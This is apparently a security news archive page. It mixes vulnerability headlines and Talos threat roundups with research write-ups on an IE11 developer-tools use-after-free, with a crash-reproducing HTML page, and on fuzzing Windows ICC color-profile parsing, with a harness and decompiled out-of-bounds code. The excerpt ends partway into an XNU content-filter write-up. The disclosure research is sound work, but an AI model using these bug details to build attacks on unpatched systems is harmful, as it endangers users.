Category Archives: Vulnerabilities

Halloween News Wrap: The Election, Hospital Deaths and Other Scary Cyberattack Stories

Threatpost breaks down the scariest stories of the week ended Oct. 30 haunting the security industry -- including bugs that just won't die.

Microsoft Warns Threat Actors Continue to Exploit Zerologon Bug

The tech giant and the feds this week renewed their call for organizations to update Active Directory domain controllers.

NVIDIA Patches Critical Bug in High-Performance Servers

NVIDIA said a high-severity information-disclosure bug impacting its DGX A100 server line wouldn't be patched until early 2021.

Tracking Users on Waze

A security researcher discovered a vulnerability in Waze that breaks the anonymity of users:

I found out that I can visit Waze from any web browser at waze.com/livemap so I decided to check how are those driver icons implemented. What I found is that I can ask Waze API for data on a location by sending my latitude and longitude coordinates. Except the essential traffic information, Waze also sends me coordinates of other drivers who are nearby. What caught my eyes was that identification numbers (ID) associated with the icons were not changing over time. I decided to track one driver and after some time she really appeared in a different place on the same road.

The vulnerability has been fixed. More interesting is that the researcher was able to de-anonymize some of the Waze users, proving yet again that anonymity is hard when we’re all so different.

Election Security: How Mobile Devices Are Shaping the Way We Work, Play and Vote

With the election just a week away, cybercriminals are ramping up mobile attacks on citizens under the guise of campaign communications.

Experts Weigh in on E-Commerce Security Amid Snowballing Threats

How a retail sector reeling from COVID-19 can lock down its online systems to prevent fraud during the upcoming holiday shopping spike.

Researchers: LinkedIn, Instagram Vulnerable to Preview-Link RCE Security Woes

Popular chat apps, including LINE, Slack, Twitter DMs and others, can also leak location data and share private info with third-party servers.

Threat Roundup for October 16 to October 23

Today, Talos is publishing a glimpse into the most prevalent threats we’ve observed between October 16 and October 23. As with previous roundups, this post isn’t meant to be an in-depth analysis. Instead, this post will summarize the threats we’ve observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.

Read More

Reference

20201023-tru.json – this is a JSON file that includes the IOCs referenced in this post, as well as all hashes associated with the cluster. The list is limited to 25 hashes in this blog post. As always, please remember that all IOCs contained in this document are indicators, and that one single IOC does not indicate maliciousness. See the Read More link above for more details.

The post Threat Roundup for October 16 to October 23 appeared first on Cisco Blogs.

IoT Device Takeovers Surge 100 Percent in 2020

The COVID-19 pandemic, coupled with an explosion in the number of connected devices, has led to a surge in IoT infections observed on wireless networks.

Nvidia Warns Gamers of Severe GeForce Experience Flaws

Versions of Nvidia GeForce Experience for Windows prior to 3.20.5.70 are affected by a high-severity bug that could enable code execution, denial of service and more.

Facebook, News and XSS Underpin Complex Browser Locker Attack

A sophisticated “browser locker” campaign is spreading via Facebook, ultimately pushing a tech-support scam. The effort is more advanced than most, because it involves exploiting a cross-site scripting (XSS) vulnerability on a popular news site, researchers said. Browser lockers are a type of redirection attack where web surfers will click on a site, only to […]

Bug Parade: NSA Warns on Cresting China-Backed Cyberattacks

The Feds have published a Top 25 exploits list, rife with big names like BlueKeep, Zerologon and other notorious security vulnerabilities.

Cisco Warns of Severe DoS Flaws in Network Security Software

The majority of the bugs in Cisco’s Firepower Threat Defense (FTD) and Adaptive Security Appliance (ASA) software can enable denial of service (DoS) on affected devices.

Oracle Kills 402 Bugs in Massive October Patch Update

Over half of Oracle's flaws in its quarterly patch update can be remotely exploitable without authentication; 65 are critical, and two have CVSS scores of 10 out of 10.

NSA Advisory on Chinese Government Hacking

The NSA released an advisory listing the top twenty-five known vulnerabilities currently being exploited by Chinese nation-state attackers.

This advisory provides Common Vulnerabilities and Exposures (CVEs) known to be recently leveraged, or scanned-for, by Chinese state-sponsored cyber actors to enable successful hacking operations against a multitude of victim networks. Most of the vulnerabilities listed below can be exploited to gain initial access to victim networks using products that are directly accessible from the Internet and act as gateways to internal networks. The majority of the products are either for remote access (T1133) or for external web services (T1190), and should be prioritized for immediate patching.

Facebook: A Top Launching Pad For Phishing Attacks

Amazon, Apple, Netflix, Facebook and WhatsApp are top brands leveraged by cybercriminals in phishing and fraud attacks - including a recent strike on a half-million Facebook users.

Microsoft Exchange, Outlook Under Siege By APTs

A new threat report shows that APTs are switching up their tactics when exploiting Microsoft services like Exchange and OWA, in order to avoid detection.

Threat Roundup for October 9 to October 16

Today, Talos is publishing a glimpse into the most prevalent threats we’ve observed between October 9 and October 16. As with previous roundups, this post isn’t meant to be an in-depth analysis. Instead, this post will summarize the threats we’ve observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.

Read More

Reference

20201016-tru.json – this is a JSON file that includes the IOCs referenced in this post, as well as all hashes associated with the cluster. The list is limited to 25 hashes in this blog post. As always, please remember that all IOCs contained in this document are indicators, and that one single IOC does not indicate maliciousness. See the Read More link above for more details.

The post Threat Roundup for October 9 to October 16 appeared first on Cisco Blogs.

Biden Campaign Staffers Targeted in Cyberattack Leveraging Antivirus Lure, Dropbox Ploy

Google's Threat Analysis Group sheds more light on targeted credential phishing and malware attacks on the staff of Joe Biden's presidential campaign.

FIFA 21 Blockbuster Release Gives Fraudsters an Open Field for Theft

In-game features of the just-released FIFA 21 title give scammers easy access to its vast audience.

Crash Reproduction Series: IE Developer Console UAF

During a DFIR investigation using ZecOps Crash Forensics on a developer’s computer, we encountered a consistent crash in Internet Explorer 11. The TL;DR is that although this bug is not exploitable, it represents an interesting expansion of the attack surface through the developer consoles of browsers.


While examining the stack trace, we noticed a JavaScript engine failure. The type of the exception was a null pointer dereference, which is typically not alarming. We investigated further to understand whether this event can be exploited.

We examined the stack trace below: 

58c0cdba     mshtml!CDiagnosticsElementEventHelper::OnDOMEventListenerRemoved2+0xb
584d6ebc     mshtml!CDomEventRegistrationCallback2<CDiagnosticsElementEventHelper>::OnDOMEventListenerRemoved2+0x1a
584d8a1c     mshtml!DOMEventDebug::InvokeUnregisterCallbacks+0x100
58489f85     mshtml!CListenerAry::ReleaseAndDelete+0x42
582f6d3a     mshtml!CBase::RemoveEventListenerInternal+0x75
5848a9f7     mshtml!COmWindowProxy::RemoveEventListenerInternal+0x1a
582fb8b9     mshtml!CBase::removeEventListener+0x57
587bf1a5     mshtml!COmWindowProxy::removeEventListener+0x29
57584dae     mshtml!CFastDOM::CWindow::Trampoline_removeEventListener+0xb5
57583bb3     jscript9!Js::JavascriptExternalFunction::ExternalFunctionThunk+0x1de
574d4492     jscript9!Js::JavascriptFunction::CallFunction<1>+0x93
[...more jscript9 functions]
581b0838     jscript9!ScriptEngineBase::Execute+0x9d
580b3207     mshtml!CJScript9Holder::ExecuteCallback+0x48
580b2fd3     mshtml!CListenerDispatch::InvokeVar+0x227
57fe5ad1     mshtml!CListenerDispatch::Invoke+0x6d
58194d17     mshtml!CEventMgr::_InvokeListeners+0x1ea
58055473     mshtml!CEventMgr::_DispatchBubblePhase+0x32
584d48aa     mshtml!CEventMgr::Dispatch+0x41e
584d387d     mshtml!CEventMgr::DispatchPointerEvent+0x1b0
5835f332     mshtml!CEventMgr::DispatchClickEvent+0x2c3
5835ce15     mshtml!CElement::Fire_onclick+0x37
583baa8e     mshtml!CElement::DoClick+0xd5
[...]

and noticed that the flow that led to the crash was:

  • An onclick handler fired due to a user input
  • The onclick handler was executed
  • removeEventListener was called

The crash happened at:

mshtml!CDiagnosticsElementEventHelper::OnDOMEventListenerRemoved2+0xb:

58c0cdcd 8b9004010000    mov     edx,dword ptr [eax+104h] ds:002b:00000104=????????

Relevant commands leading to a crash:

58c0cdc7 8b411c       mov     eax, dword ptr [ecx+1Ch]
58c0cdca 8b401c       mov     eax, dword ptr [eax+1Ch]
58c0cdcd 8b9004010000 mov     edx, dword ptr [eax+104h]

Initially ecx is the “this” pointer of the called member function’s class. On the first dereference we get a zeroed region, on the second dereference we get NULL, and on the third one we crash.
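
In C-like terms, the dereference chain can be sketched as follows (the field names are illustrative, not taken from symbols):

helper = this->pHelperAt1C;    // 1st dereference: yields a pointer into the freed, zeroed region
target = helper->pTargetAt1C;  // 2nd dereference: the zeroed region yields NULL
value  = target->fieldAt104;   // 3rd dereference: [NULL + 0x104] faults, matching the crash address above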

Reproduction

We tried to reproduce a legit call to mshtml!CDiagnosticsElementEventHelper::OnDOMEventListenerRemoved2 to see how it looks in a non-crashing scenario. We came to the conclusion that the event is called only when the IE Developer Tools window is open with the Events tab.

We found out that when the dev tools Events tab is opened, it subscribes to events for added and removed event listeners. When the dev tools window is closed, the event consumer is freed without unsubscribing, causing a use-after-free bug which results in a null dereference crash.

Summary

Tools such as the Developer Tools dynamically add complexity to the process and may open up additional attack surface.

Exploitation

Even though Use-After-Free (UAF) bugs can often be exploited for arbitrary code execution, this bug is not exploitable due to MemGC mitigation. The freed memory block is zeroed, but not deallocated while other valid objects still point to it. As a result, the referenced pointer is always a NULL pointer, leading to a non-exploitable crash.

Responsible Disclosure

We reported this issue to Microsoft, which decided not to fix this UAF issue.

POC

Below is a small HTML page that demonstrates the concept and leads to a crash.
Tested IE11 version: 11.592.18362.0
Update Versions: 11.0.170 (KB4534251)

<!DOCTYPE html>
<html>
<body>
<pre>
1. Open dev tools
2. Go to Events tab
3. Close dev tools
4. Click on Enable
</pre>
<button onclick="setHandler()">Enable</button>
<button onclick="removeHandler()">Disable</button>
<p id="demo"></p>
<script>
function myFunction() {
    document.getElementById("demo").innerHTML = Math.random();
}
function setHandler() {
    document.body.addEventListener("mousemove", myFunction);
}
function removeHandler() {
    document.body.removeEventListener("mousemove", myFunction);
}
</script>
</body>
</html>


Hacking Apple for Profit

Five researchers hacked Apple Computer’s networks — not their products — and found fifty-five vulnerabilities. So far, they have received $289K.

One of the worst of all the bugs they found would have allowed criminals to create a worm that would automatically steal all the photos, videos, and documents from someone’s iCloud account and then do the same to the victim’s contacts.

Lots of details in this blog post by one of the hackers.

Threat Roundup for October 2 to October 9

Today, Talos is publishing a glimpse into the most prevalent threats we’ve observed between October 2 and October 9. As with previous roundups, this post isn’t meant to be an in-depth analysis. Instead, this post will summarize the threats we’ve observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.

Read More

Reference

20201009-tru.json – this is a JSON file that includes the IOCs referenced in this post, as well as all hashes associated with the cluster. The list is limited to 25 hashes in this blog post. As always, please remember that all IOCs contained in this document are indicators, and that one single IOC does not indicate maliciousness. See the Read More link above for more details.

The post Threat Roundup for October 2 to October 9 appeared first on Cisco Blogs.

Announcing the launch of the Android Partner Vulnerability Initiative

Posted by Kylie McRoberts, Program Manager and Alec Guertin, Security Engineer


Google’s Android Security & Privacy team has launched the Android Partner Vulnerability Initiative (APVI) to manage security issues specific to Android OEMs. The APVI is designed to drive remediation and provide transparency to users about issues we have discovered at Google that affect device models shipped by Android partners.

Another layer of security

Android incorporates industry-leading security features and every day we work with developers and device implementers to keep the Android platform and ecosystem safe. As part of that effort, we have a range of existing programs to enable security researchers to report security issues they have found. For example, you can report vulnerabilities in Android code via the Android Security Rewards Program (ASR), and vulnerabilities in popular third-party Android apps through the Google Play Security Rewards Program. Google releases ASR reports in Android Open Source Project (AOSP) based code through the Android Security Bulletins (ASB). These reports are issues that could impact all Android based devices. All Android partners must adopt ASB changes in order to declare the current month’s Android security patch level (SPL). But until recently, we didn’t have a clear way to process Google-discovered security issues outside of AOSP code that are unique to a much smaller set of specific Android OEMs. The APVI aims to close this gap, adding another layer of security for this targeted set of Android OEMs.

Improving Android OEM device security

The APVI covers Google-discovered issues that could potentially affect the security posture of an Android device or its user and is aligned to ISO/IEC 29147:2018 Information technology -- Security techniques -- Vulnerability disclosure recommendations. The initiative covers a wide range of issues impacting device code that is not serviced or maintained by Google (these are handled by the Android Security Bulletins).

Protecting Android users

The APVI has already processed a number of security issues, improving user protection against permissions bypasses, execution of code in the kernel, credential leaks and generation of unencrypted backups. Below are a few examples of what we’ve found, the impact and OEM remediation efforts.

Permission Bypass

In some versions of a third-party pre-installed over-the-air (OTA) update solution, a custom system service in the Android framework exposed privileged APIs directly to the OTA app. The service ran as the system user and did not require any permissions to access, instead checking for knowledge of a hardcoded password. The operations available varied across versions, but always allowed access to sensitive APIs, such as silently installing/uninstalling APKs, enabling/disabling apps and granting app permissions. This service appeared in the code base for many device builds across many OEMs, however it wasn’t always registered or exposed to apps. We’ve worked with impacted OEMs to make them aware of this security issue and provided guidance on how to remove or disable the affected code.

Credential Leak

A popular web browser pre-installed on many devices included a built-in password manager for sites visited by the user. The interface for this feature was exposed to WebView through JavaScript loaded in the context of each web page. A malicious site could have accessed the full contents of the user’s credential store. The credentials are encrypted at rest, but used a weak algorithm (DES) and a known, hardcoded key. This issue was reported to the developer and updates for the app were issued to users.

Overly-Privileged Apps

The checkUidPermission method in the PackageManagerService class was modified in the framework code for some devices to allow special permissions access to some apps. In one version, the method granted apps with the shared user ID com.google.uid.shared any permission they requested and apps signed with the same key as the com.google.android.gsf package any permission in their manifest. Another version of the modification allowed apps matching a list of package names and signatures to pass runtime permission checks even if the permission was not in their manifest. These issues have been fixed by the OEMs.

More information

Keep an eye out at https://bugs.chromium.org/p/apvi/ for future disclosures of Google-discovered security issues under this program, or find more information there on issues that have already been disclosed.

Acknowledgements: Scott Roberts, Shailesh Saini and Łukasz Siewierski, Android Security and Privacy Team

Fuzzing Image Parsing in Windows, Part One: Color Profiles

Image parsing and rendering are basic features of any modern operating system (OS). Image parsing is an easily accessible attack surface, and a vulnerability that may lead to remote code execution or information disclosure in such a feature is valuable to attackers. In this multi-part blog series, I am reviewing Windows OS’ built-in image parsers and related file formats: specifically looking at creating a harness, hunting for corpus and fuzzing to find vulnerabilities. In part one of this series I am looking at color profiles—not an image format itself, but something which is regularly embedded within images. 

What is an ICC Color Profile?

Wikipedia provides a more-than-adequate description of ICC color profiles: "In color management, an ICC profile is a set of data that characterizes a color input or output device, or a color space, according to standards promulgated by the International Color Consortium (ICC). Profiles describe the color attributes of a particular device or viewing requirement by defining a mapping between the device source or target color space and a profile connection space (PCS). This PCS is either CIELAB (L*a*b*) or CIEXYZ. Mappings may be specified using tables, to which interpolation is applied, or through a series of parameters for transformations."

In simpler terms, an ICC color profile is a binary file that gets embedded into images and parsed whenever ICC supported software processes the images. 

Specification

The ICC specification is around 100 pages and should be easy to skim through. Reading through specifications gives a better understanding of the file format, different types of color profiles, and math behind the color transformation. Furthermore, understanding of its file format internals provides us with information that can be used to optimize fuzzing, select a good corpus, and prepare fuzzing dictionaries.
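
For orientation, here is a minimal sketch of the fixed 128-byte profile header and the tag table that follows it, as laid out in the specification (all fields are big-endian; the field names are abbreviations, not official identifiers):

#pragma pack(push, 1)
struct ICC_PROFILE_HEADER {        // 128 bytes
    DWORD ProfileSize;             // total size of the profile
    DWORD PreferredCmmType;
    DWORD ProfileVersion;
    DWORD ProfileDeviceClass;      // one of the seven profile classes, e.g. 'mntr', 'nmcl'
    DWORD DataColorSpace;
    DWORD Pcs;                     // profile connection space: 'Lab ' or 'XYZ '
    BYTE  CreationDateTime[12];
    DWORD AcspSignature;           // always 'acsp'
    DWORD PrimaryPlatform;
    DWORD Flags;
    DWORD DeviceManufacturer;
    DWORD DeviceModel;
    BYTE  DeviceAttributes[8];
    DWORD RenderingIntent;
    BYTE  PcsIlluminant[12];       // XYZNumber
    DWORD Creator;
    BYTE  ProfileId[16];           // MD5 of the profile
    BYTE  Reserved[28];
};

struct ICC_TAG_ENTRY {             // the header is followed by a DWORD tag count and this table
    DWORD Signature;               // e.g. 'desc', 'wtpt', 'ncl2'
    DWORD Offset;                  // offset of the tag data from the start of the profile
    DWORD Size;                    // size of the tag data
};
#pragma pack(pop)

The tag table is where dictionary entries and corpus-selection heuristics come from: every tag signature, offset and size is attacker-controlled data that the parser must validate.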

History of Color Management in Windows

Windows started shipping Image Color Management (ICM) version 1.0 with Windows 95, and version 2.0 from Windows 98 onwards. A major overhaul came with Windows Color System (WCS) 1.0 in Windows Vista. While ICC color profiles are binary files, WCS color profiles use XML as their file format. In this blog post, I am going to concentrate on ICC color profiles.

Microsoft has a list of supported Windows APIs. Looking into some of the obviously named APIs, such as OpenColorProfile, we can see that it is implemented in MSCMS.dll. This DLL is a generic entry point and supports loading of Microsoft’s Color Management Module (CMM) and third-party CMMs such as Adobe’s CMM. Microsoft’s CMM—the ICM—can be found as ICM32.dll in system32 directory. 


Figure 1: ICM32

Windows’ CMM was written by a third-party during the Windows 95 era and still ships more or less with the same code (with security fixes over the decades). Seeing such an old module gives me some hope of finding a new vulnerability. But this is also a small module that may have gone through multiple rounds of review and fuzzing: both by internal product security teams and by external researchers, reducing my hopes to a certain degree. Looking for any recent vulnerabilities in ICM32, we can see multiple bugs from 2017-2018 by Project Zero and ZDI researchers, but then relative silence from 2019 onwards.

Making a Harness

Although there is a list of ICM APIs on MSDN, we need to find the API sequence used by Windows for ICC-related operations. One way to find our API sequence is to search a disassembly of Windows DLLs and EXEs in the hope of finding the color profile APIs being used. Another approach is to find a harness for an open source Color Management System such as Little CMS (LCMS). Both of these end up pointing to a very small set of APIs with functionality to open color profiles and create color transformations.

Given this information, a simple initial harness was written: 

#include <stdio.h>
#include <Windows.h>
#include <Icm.h>

#pragma comment(lib, "mscms.lib")

int main(int argc, char** argv)
{
    char dstProfilePath[] = "sRGB Color Space Profile.icm";
    tagPROFILE destinationProfile;
    HPROFILE   hDstProfile = nullptr;   

    destinationProfile.dwType = PROFILE_FILENAME;
    destinationProfile.pProfileData = dstProfilePath;
    destinationProfile.cbDataSize = (strlen(dstProfilePath) + 1);

    hDstProfile = OpenColorProfileA(&destinationProfile, PROFILE_READ,
        FILE_SHARE_READ, OPEN_EXISTING);
    if (nullptr == hDstProfile)
    {
        return -1;
    }   

    tagPROFILE sourceProfile;
    HPROFILE   hSrcProfile = nullptr;
    HTRANSFORM hColorTransform = nullptr;     

    DWORD dwIntent[] = { INTENT_PERCEPTUAL, INTENT_PERCEPTUAL };
    HPROFILE hProfileList[2];   

    sourceProfile.dwType = PROFILE_FILENAME;
    sourceProfile.pProfileData = argv[1];
    sourceProfile.cbDataSize = (strlen(argv[1]) + 1);

    hSrcProfile = OpenColorProfileA(&sourceProfile, PROFILE_READ,
        FILE_SHARE_READ, OPEN_EXISTING);
    if (nullptr == hSrcProfile)
    {
        return -1;
    }   

    hProfileList[0] = hSrcProfile;
    hProfileList[1] = hDstProfile;

    hColorTransform = CreateMultiProfileTransform(
        hProfileList,
        2,
        dwIntent,
        2,
        USE_RELATIVE_COLORIMETRIC | BEST_MODE,
        INDEX_DONT_CARE
    );

    if (nullptr == hColorTransform)
    {
        return -1;
    }   

    DeleteColorTransform(hColorTransform);
    CloseColorProfile(hSrcProfile);
    CloseColorProfile(hDstProfile);
    return 0;
}

Listing 1: Harness

Hunting for Corpus and Dictionary

Sites offering multiple color profiles can be found all over the internet. Another main source of color profiles is images; many image files embed a color profile, but some programming or tooling is required to dump it to a stand-alone file.
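
As an illustration of the "some programming" part, below is a minimal sketch that dumps the ICC data embedded in a JPEG by walking its APP2 ("ICC_PROFILE") marker segments. It assumes a well-formed file and, for brevity, that the profile chunks are stored in order; existing tools (e.g. exiftool) can do the same.

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(int argc, char **argv)
{
    if (argc != 3) {
        fprintf(stderr, "usage: %s in.jpg out.icc\n", argv[0]);
        return 1;
    }
    FILE *in = fopen(argv[1], "rb");
    FILE *out = fopen(argv[2], "wb");
    if (in == NULL || out == NULL) {
        return 1;
    }

    unsigned char soi[2];
    if (fread(soi, 1, 2, in) != 2 || soi[0] != 0xFF || soi[1] != 0xD8) {
        return 1;                          // not a JPEG (missing SOI marker)
    }

    for (;;) {
        int c = fgetc(in);
        if (c == EOF) break;
        if (c != 0xFF) continue;           // resync on the 0xFF marker prefix
        int marker = fgetc(in);
        while (marker == 0xFF) marker = fgetc(in);              // skip fill bytes
        if (marker == EOF || marker == 0xD9 || marker == 0xDA) break;  // EOI / start of scan
        if (marker == 0x01 || (marker >= 0xD0 && marker <= 0xD7)) continue;  // no length field
        int hi = fgetc(in), lo = fgetc(in);
        if (hi == EOF || lo == EOF) break;
        long len = ((hi << 8) | lo) - 2;   // segment length excludes the length field itself
        if (marker == 0xE2 && len > 14) {  // APP2 segments may carry ICC data
            unsigned char sig[14];         // "ICC_PROFILE\0" + chunk seq number + chunk count
            if (fread(sig, 1, 14, in) != 14) break;
            len -= 14;
            if (memcmp(sig, "ICC_PROFILE\0", 12) == 0) {
                unsigned char *buf = malloc(len);
                if (buf == NULL || fread(buf, 1, len, in) != (size_t)len) break;
                fwrite(buf, 1, len, out);  // append this chunk of the profile
                free(buf);
                continue;
            }
        }
        fseek(in, len, SEEK_CUR);          // skip segments we don't care about
    }
    fclose(in);
    fclose(out);
    return 0;
}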

Simply by skimming the specification, we can also make sure the corpus contains at least one sample of each of the seven different profile classes. This, along with code coverage information, can be used to prepare the first corpus for fuzzing.

A dictionary, which helps the fuzzer to find additional code paths, can be prepared by combing through specifications and creating a list of unique tag names and values. One can also find dictionaries from open source fuzzing attempts on LCMS, etc.
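
For example, a few entries of an AFL-style dictionary built from the tag and type signatures in the specification might look like this (non-exhaustive):

sig_acsp="acsp"
tag_desc="desc"
tag_wtpt="wtpt"
tag_cprt="cprt"
tag_rXYZ="rXYZ"
tag_rTRC="rTRC"
tag_A2B0="A2B0"
tag_ncl2="ncl2"
type_mluc="mluc"
type_curv="curv"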

Fuzzing

I used a 16-core machine to fuzz the harness with my first set of corpuses. Code coverage information from MSCMS.dll and ICM32.dll was used as feedback for my fuzzer. Crashes started to appear within a couple of days.

CVE-2020-1117 — Heap Overflow in InitNamedColorProfileData

The following crash happens in icm32!SwapShortOffset while trying to read out of bounds:

0:000> r
rax=0000023690497000 rbx=0000000000000000 rcx=00000000000000ff
rdx=000000000000ffff rsi=0000023690496f00 rdi=0000023690496fee
rip=00007ffa46bf3790 rsp=000000c2a56ff5a8 rbp=0000000000000001
 r8=0000000000000014  r9=0000023690497002 r10=0000000000000014
r11=0000000000000014 r12=000000c2a56ff688 r13=0000023690492de0
r14=000000000000000a r15=000000004c616220
iopl=0         nv up ei ng nz ac pe cy
cs=0033  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000293
icm32!SwapShortOffset+0x10:
00007ffa`46bf3790 0fb610          movzx   edx,byte ptr [rax] ds:00000236`90497000=??

0:000> !heap -p -a @rax
    address 0000023690497000 found in
    _DPH_HEAP_ROOT @ 23690411000
    in busy allocation (  DPH_HEAP_BLOCK:         UserAddr         UserSize -         VirtAddr         VirtSize)
                             23690412b60:      23690496f00              100 -      23690496000             2000
    00007ffa51644807 ntdll!RtlDebugAllocateHeap+0x000000000000003f
    00007ffa515f49d6 ntdll!RtlpAllocateHeap+0x0000000000077ae6
    00007ffa5157babb ntdll!RtlpAllocateHeapInternal+0x00000000000001cb
    00007ffa51479da0 msvcrt!malloc+0x0000000000000070
    00007ffa46bf3805 icm32!SmartNewPtr+0x0000000000000011
    00007ffa46bf37c8 icm32!SmartNewPtrClear+0x0000000000000014
    00007ffa46c02d05 icm32!InitNamedColorProfileData+0x0000000000000085
    00007ffa46bf6e39 icm32!Create_LH_ProfileSet+0x0000000000004e15
    00007ffa46bf1973 icm32!PrepareCombiLUTs+0x0000000000000117
    00007ffa46bf1814 icm32!CMMConcatInitPrivate+0x00000000000001f4
    00007ffa46bf12a1 icm32!CWConcatColorWorld4MS+0x0000000000000075
    00007ffa46bf11f4 icm32!CMCreateMultiProfileTransformInternal+0x00000000000000e8
    00007ffa46bf1039 icm32!CMCreateMultiProfileTransform+0x0000000000000029
    00007ffa48f16e6c mscms!CreateMultiProfileTransform+0x000000000000024c
    00007ff774651191 ldr+0x0000000000001191
    00007ff7746514b4 ldr+0x00000000000014b4
    00007ffa505a7bd4 KERNEL32!BaseThreadInitThunk+0x0000000000000014
    00007ffa515aced1 ntdll!RtlUserThreadStart+0x0000000000000021

Listing 2: Crash info

icm32!SwapShortOffset reads unsigned short values, bswaps them and stores at the same location, giving this crash both read and write primitives.

unsigned __int16 *__fastcall SwapShortOffset(void *sourceBuff, unsigned int offset, unsigned int len)
{
  unsigned __int16 *endBuff; // r9
  unsigned __int16 *result; // rax

  endBuff = (sourceBuff + len);
  for ( result = (sourceBuff + offset); result < endBuff; ++result )
    *result = _byteswap_ushort(*result);        // read, bswap and write
  return result;
}

Listing 3: SwapShortOffset decompiled

The crashing function icm32!SwapShortOffset doesn’t immediately point to the root cause of the bug. For that, we need to go one call up to icm32!InitNamedColorProfileData.

__int64 __fastcall InitNamedColorProfileData(__int64 a1, void *hProfile, int a3, _DWORD *a4)
{
  ...
  ...
  errCode = CMGetPartialProfileElement(hProfile, 'ncl2', 0, pBuffSize, 0i64);      // getting size of ncl2 element
  if ( errCode )
    return errCode;
  minSize = pBuffSize[0];
  if ( pBuffSize[0] < 0x55 )
    minSize = 0x55;
  pBuffSize[0] = minSize;
  outBuff = SmartNewPtrClear(minSize, &errCode);                                    // allocating the buffer for ncl2
  ...
  ...
  errCode = CMGetPartialProfileElement(hProfile, 'ncl2', 0, pBuffSize, outBuff);    // reading ncl2 elements to buffer
  if ( !errCode )
  {
    ...
    ...
    totalSizeToRead = count * totalDeviceCoord;
    if ( totalSizeToRead < 0xFFFFFFFFFFFFFFAEui64 && totalSizeToRead + 0x51 <= pBuffSize[0] )  // totalSizeToRead + 0x51 <= element size?
    {
      currPtr = outBuff + 0x54;            // wrong offset of 0x54 is used
      ...
      ...
      do
      {   
        SwapShortOffset((currPtr + 0x20), 0, 6u);
        ...
        --count;
      }while(count)

Listing 4: InitNamedColorProfileData decompiled

Here the code reads the ‘ncl2’ tag/element to get the size of the stream from the file. A buffer is allocated, and the same call is made once again to read the complete content of the ‘ncl2’ element. This buffer is parsed to find the count and number of device coordinates, and the values are verified by making sure the read/write ends up within the buffer size. The vulnerability here is that the offset (0x51) used for verification is smaller than the offset (0x54) used to advance the buffer pointer. This error provides a 3-byte out-of-bounds read and write.

The fix for this was pretty straightforward: change the verification offset to 0x54, which is how Microsoft fixed this bug.
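
Reduced to its essence (offsets as described above; the function and variable names here are illustrative), the vulnerable and fixed checks look like this:

// vulnerable: verifies against +0x51 but the parser starts at +0x54,
// leaving a 3-byte out-of-bounds window at the end of the allocation
if (totalSizeToRead + 0x51 <= bufferSize)
    ParseNamedColors(outBuff + 0x54, count);   // reads, byte-swaps and writes back here

// fixed: the verification offset matches the offset actually used
if (totalSizeToRead + 0x54 <= bufferSize)
    ParseNamedColors(outBuff + 0x54, count);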

Additional Vulnerabilities

While looking at the previous vulnerability, one can see a pattern of using the CMGetPartialProfileElement function for reading the size, allocation, and reading content. This sort of pattern can introduce bugs such as unconstrained size or integer overflow while adding an offset to the size, etc. I decided to pursue this function and see if such instances are present within ICM32.dll.

I found three instances which had an unchecked offset access: CMConvIndexToNameProfile, CMConvNameToIndexProfile and CMGetNamedProfileInfoProfile. All of these functions are accessible through exported and documented MSCMS functions: ConvertIndexToColorName, CMConvertColorNameToIndex, and GetNamedProfileInfo respectively.

__int64 __fastcall CMConvIndexToNameProfile(HPROFILE hProfile, __int64 a2, __int64 a3, unsigned int a4)
{
  ...
  ...
  errCode = CMGetPartialProfileElement(hProfile, 'ncl2', 0, pBuffSize, 0i64);    // read size
  if ( !errCode )
  {
    allocBuff = SmartNewPtr(pBuffSize[0], &errCode);
    if ( !errCode )
    {
      errCode = CMGetPartialProfileElement(hProfile, 'ncl2', 0, pBuffSize, allocBuff);    // read to buffer
      if ( !errCode )
      {
        SwapLongOffset((allocBuff + 12), 0, 4u);         // 12 > *pBuffSize ?
        SwapLongOffset((allocBuff + 16), v12, v13);

Listing 5: CMConvIndexToNameProfile decompiled

The bug discovered in CMConvIndexToNameProfile and the other two functions is that there is no minimum length check for ‘ncl2’ elements, and offsets 12 and 16 are directly accessed for both read and write, providing an out-of-bounds read/write on allocBuff if the size of the allocation is smaller than 12.

Microsoft decided not to immediately fix these three vulnerabilities due to the fact that none of the Windows binaries use these functions. Independently, we did not find any Windows or third-party software using these APIs.

Conclusion

In part one of this blog series, we looked into color profiles, wrote a harness, hunted for corpus and successfully found multiple vulnerabilities. Stay tuned for part two, where we will be looking at a relatively less talked about vulnerability class: uninitialized memory.

From a comment to a CVE: Content filter strikes again!

0x0- Opening

In the past few years, XNU has had a few vulns in newly added/changed code areas (extra_recipe, kq double release) and in the content filter area (bug collision UAF, silently patched UAF), so it is no surprise that the combination of newly added code, a complex area (content filter) and a funny comment caught our attention.

0x1- Discovery story

Upon a closer look at the newly added xnu source of Darwin 19 you might notice a strange comment in content_filter.c:

/*
 *	TO DO LIST
 *
 *	SOONER:
 *
 *	Deal with OOB
 *
 *	LATER:
 *
 *	If support datagram, enqueue control and address mbufs as well
 */

Is this comment referring to OOB read/write issues? Probably not, but it won’t hurt to run a quick search for those, so we use the magic tool CMD+F to search for memcpy calls, and in less than two minutes you will find the following.

0x2- The bug.

The newly updated cfil_sock_attach function, which is easily reached from tcp_usr_connect and tcp_usr_connectx with controlled variables:

errno_t
cfil_sock_attach(struct socket *so, struct sockaddr *local, struct sockaddr *remote, int dir) // (Part A)
{
